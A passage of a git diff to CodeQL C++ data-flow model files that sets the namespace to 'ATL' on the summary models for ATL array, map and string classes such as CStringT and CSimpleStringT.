"", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file + - ["ATL", "CSimpleArray", True, "CSimpleArray", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "Add", "", "", "Argument[*0]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CSimpleMap.model.yml b/cpp/ql/lib/ext/CSimpleMap.model.yml index 1d9422a05611..9558cad0caa5 100644 --- a/cpp/ql/lib/ext/CSimpleMap.model.yml +++ b/cpp/ql/lib/ext/CSimpleMap.model.yml @@ -3,11 +3,11 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file + - ["ATL", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CSimpleStringT.model.yml b/cpp/ql/lib/ext/CSimpleStringT.model.yml index 9902e5b60007..9554103994e6 100644 --- a/cpp/ql/lib/ext/CSimpleStringT.model.yml +++ b/cpp/ql/lib/ext/CSimpleStringT.model.yml @@ -3,40 +3,40 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # TODO this model can be improved a lot once we have MapKey content # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CSimpleStringT", True, "CSimpleStringT", "(const XCHAR *,int,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CSimpleStringT", True, "CSimpleStringT", "(PCXSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CSimpleStringT", True, "CSimpleStringT", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CSimpleStringT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "AppendChar", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "CopyChars", "(XCHAR *,const XCHAR *,int)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CSimpleStringT", True, "CopyChars", "(XCHAR *,size_t,const XCHAR *,int)", "", "Argument[*2]", "Argument[*0]", "taint", "manual"] - - ["", "CSimpleStringT", True, "CopyCharsOverlapped", "(XCHAR *,const XCHAR *,int)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CSimpleStringT", True, "GetString", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CSimpleStringT", True, "LockBuffer", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CSimpleStringT", True, "SetAt", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "SetString", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CSimpleStringT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CSimpleStringT", True, "operator[]", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CSimpleStringT", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CSimpleStringT", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CSimpleStringT", True, "GetAt", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CSimpleStringT", True, "GetBuffer", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CSimpleStringT", True, "GetBufferSetLength", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file + - ["ATL", "CSimpleStringT", True, "CSimpleStringT", "(const XCHAR *,int,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "CSimpleStringT", "(PCXSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "CSimpleStringT", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "AppendChar", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "CopyChars", "(XCHAR *,const XCHAR *,int)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "CopyChars", "(XCHAR *,size_t,const XCHAR *,int)", "", "Argument[*2]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "CopyCharsOverlapped", "(XCHAR *,const XCHAR *,int)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "GetString", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "LockBuffer", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "SetAt", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "SetString", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "operator[]", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(unsigned char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator+=", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "GetAt", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CSimpleStringT", True, "GetBuffer", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CSimpleStringT", True, "GetBufferSetLength", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CStrBufT.model.yml b/cpp/ql/lib/ext/CStrBufT.model.yml index a8abace32e60..9c915e6c3076 100644 --- a/cpp/ql/lib/ext/CStrBufT.model.yml +++ b/cpp/ql/lib/ext/CStrBufT.model.yml @@ -3,6 +3,6 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: - - ["", "CStrBufT", True, "CStrBufT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStrBufT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CStrBufT", True, "operator PXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStrBufT", True, "CStrBufT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStrBufT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStrBufT", True, "operator PXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/lib/ext/CStringData.model.yml b/cpp/ql/lib/ext/CStringData.model.yml index 6cf0d610cb7a..d5044135fb88 100644 --- a/cpp/ql/lib/ext/CStringData.model.yml +++ b/cpp/ql/lib/ext/CStringData.model.yml @@ -3,4 +3,4 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: - - ["", "CStringData", True, "data", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringData", True, "data", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/lib/ext/CStringT.model.yml b/cpp/ql/lib/ext/CStringT.model.yml index 0a8b89e03fb9..c416a41226f0 100644 --- a/cpp/ql/lib/ext/CStringT.model.yml +++ b/cpp/ql/lib/ext/CStringT.model.yml @@ -3,116 +3,116 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # TODO this model can be improved a lot once we have MapKey content # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CStringT", True, "CStringT", "(const VARIANT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const VARIANT &,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const CStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const XCHAR *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const YCHAR *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(LPCSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(LPCWSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(wchar_t *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const unsigned char *,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(char,int)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "CStringT", "(wchar_t,int)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "CStringT", "(const XCHAR *,int)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const YCHAR *,int)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const XCHAR *,int,AtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "CStringT", "(const YCHAR *,int,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "AllocSysString", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Format", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessageV", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatMessageV", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatV", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "FormatV", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Insert", "(int,PCXSTR)", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Insert", "(int,XCHAR)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Left", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "Right", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "LoadString", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "LoadString", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "MakeLower", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "MakeReverse", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "MakeUpper", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "Mid", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "Replace", "(PCXSTR,PCXSTR)", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "Replace", "(XCHAR,XCHAR)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CStringT", True, "SetSysString", "", "", "Argument[-1]", "ReturnValue", "value", "manual"] - - ["", "CStringT", True, "SetSysString", "", "", "Argument[-1]", "Argument[**0]", "value", "manual"] - - ["", "CStringT", True, "SpanExcluding", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "SpanIncluding", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "Tokenize", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CStringT", True, "Trim", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "TrimLeft", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "TrimRight", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CStringT", True, "operator=", "(const CStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const CStringT &)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(PCYSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(PCYSTR)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const unsigned char *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(XCHAR)", "", "Argument[0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(XCHAR)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(YCHAR)", "", "Argument[0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(YCHAR)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const VARIANT &)", "", "Argument[0]", "Argument[-1]", "value", "manual"] - - ["", "CStringT", True, "operator=", "(const VARIANT &)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] - - ["", "", True, "operator+", "(const CStringT &,const CStringT &)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(const CStringT &,PCXSTR)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(PCXSTR,const CStringT &)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(char,const CStringT &)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(char,const CStringT &)", "", "Argument[*1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(const CStringT &,char)", "", "Argument[*0]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(const CStringT &,char)", "", "Argument[1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(const CStringT &,wchar_t)", "", "Argument[*0]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(const CStringT &,wchar_t)", "", "Argument[1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(wchar_t, const CStringT &)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+", "(wchar_t,const CStringT &)", "", "Argument[*1]", "ReturnValue", "taint", "manual"] - - ["", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(const CStaticString &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCXSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCYSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCYSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(PCYSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(unsigned char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(unsigned char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(unsigned char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(wchar_t)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(wchar_t)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(const VARIANT &)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] - - ["", "", True, "operator+=", "(const VARIANT &)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "", True, "operator+=", "(const VARIANT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] \ No newline at end of file + - ["ATL", "CStringT", True, "CStringT", "(const VARIANT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const VARIANT &,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const CStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const XCHAR *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const YCHAR *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(LPCSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(LPCWSTR,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(wchar_t *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const unsigned char *,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - 